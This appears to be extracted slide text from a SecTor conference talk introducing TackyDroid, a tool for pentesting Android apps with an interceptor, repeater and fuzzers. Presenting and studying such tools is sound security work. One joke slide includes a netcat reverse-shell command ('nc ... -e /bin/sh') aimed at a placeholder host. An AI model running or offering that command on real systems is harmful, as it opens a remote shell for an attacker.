TACKYDROID
Pentesting Android Applications in Style
TACKYDROID Pentesting Android Applications in Style THIS TALK IS - - PowerPoint PPT Presentation
TACKYDROID Pentesting Android Applications in Style THIS TALK IS ABOUT AN APP WE ARE MAKING This talk IS NOT about Android platform itself This talk IS about how we want to contribute auditing apps that run on Android systems With
TACKYDROID
Pentesting Android Applications in Style
WARNING!
apps that run on Android systems
testing
AGENDA
BACKGROUND
$ whoami ; id ; uname -r ; cat /etc/*-release $ nc x.x.x.x 443 -e /bin/sh
CHRIS / KURISU
MATT WHO THE HELL?!
MATT WHO THE HELL?!
MATT
spot the hacker
not a haxor
no haxor here
hacker cat for sure
TackyDroid???
What the f@#k is TackyDroid???
What the f@#k is TackyDroid???
It’s not a proxy ...
What the f@#k is TackyDroid???
It’s overlaid so that makes it cool and very hipster.
Why we started
hipster m0de
tedious office work(don’t tell our boss)
More tools for you
Random Stats
What is this number?
Crazy setups
What is this number?
Sure that random stats make presentations better
Crazy setups
environment can be very unique in terms of access
worst).
Crazy setups
l33t vulns
into two parts
the app
l33t vulns
l33t vulns
should not be entitled
Client side vulns in a droidshell
Client side vulns in a droidshell
l33t vulns
l33t vulns
information leakage
crime? Just looks at Google’s apps...
l33t vulns
Vulnerability
attacker to redirect users to an attacker-controlled site
Corruption Vulnerability
Bypass Vulnerability
security restrictions to perform unauthorized actions
l33t vulns
Tackydroids guts
Enough bullshit, let’s get into TackyDroid
Tackydroids guts
No root privilege is needed
UI design - Thank you F@cebook!!
Facebook app ?
activities
UI design - Overlayyyyedddd
UI design - Overlayyyyedddd
Interceptor
incoming request
BEEFCAKE!
Interceptor
QUICKLIST
Interceptor
Interceptor
Repeater
send the request to the repeater tab
Repeater
Repeater
Dumb fuzzer
webview
Dumb fuzzer
Dumb fuzzer
Dumb fuzzer
Automatic fuzzer
pretty soon
Demo
from the browser
That’s all folks
Usage Examples
Usage Examples
Problems we faced
Initial problems
to switch between activities
Conclusion
debug functionality for the target app
playing games
tools
Free giveaways
FUTURE WORK
NEW UI!!!
NEW UI!!!
GOOD NEWS
Bad news
code looks like this
QUESTIONS?
THANK YOU SecTor!